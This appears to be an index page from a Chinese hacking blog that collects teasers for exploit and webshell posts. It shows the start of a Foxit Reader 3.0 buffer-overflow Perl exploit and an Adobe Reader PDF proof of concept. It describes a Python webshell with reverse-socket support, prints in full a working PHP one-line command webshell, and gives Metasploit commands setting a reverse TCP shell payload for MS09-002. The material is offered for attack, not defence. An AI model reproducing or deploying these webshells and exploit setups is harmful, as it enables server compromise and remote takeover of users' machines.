#!/usr/bin/perl
#
# Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit
# ------------------------------------------------------------
# Exploit by SkD ([email protected])
#
# A SEH overflow occurs in this vulnerability in the popular
# Foxit Reader. The latest build (1506) is not affected but
# previous are. SafeSEH is a bitch in this one, but nothing
# is impossible :).
#
# Exploit written for Windows XP SP3.
#
# Credits to CORE Sec.
#
# Note: Author is not responsible for any damage done with this.
阅读全文 »
Tags: Exploit,
Foxit Reader,
PDF
来源:Xeye Hack Team
python版的webshell。
1.0版本的功能有:
1、文件、文件夹相关信息统计与操作功能,比如:列、删除、复制、读取、创建等等。
2、服务器信息查看。
3、执行自定义python命令。
4、socket反弹。
阅读全文 »
Tags: Python,
WebShell
作者:skyfire[B.H.S.T]
隐藏并修改文件的最后修改时间的asp-webshell。
源码:
阅读全文 »
Tags: ASP,
WebShell,
修改时间
作者:skyfire[B.H.S.T]
源码:
<?php
/*一个新型的php一句话cmdshell(非一句话木马)
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
//局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报;``里面不能执行php代码;
//write by skyfire
*/
echo `$_REQUEST[id]`;
?>
阅读全文 »
Tags: PHP,
WebShell
#!/usr/bin/perl
# k`sOSe 02/22/2009
# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
my $size = “\x40\x00”;
my $factor = “ABCD”;
my $data = “A” x 8314;
阅读全文 »
Tags: 0day,
Adobe,
Adobe Acrobat Reader,
PoC
causes an exception at 41414141
http://milw0rm.com/sploits/2009-41414141.pdf
# milw0rm.com [2009-02-23]
Tags: PDF,
PoC
来源:Carnal0wnage Blog
Details to follow. :-)
msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
阅读全文 »
Tags: Exploit,
MS09-002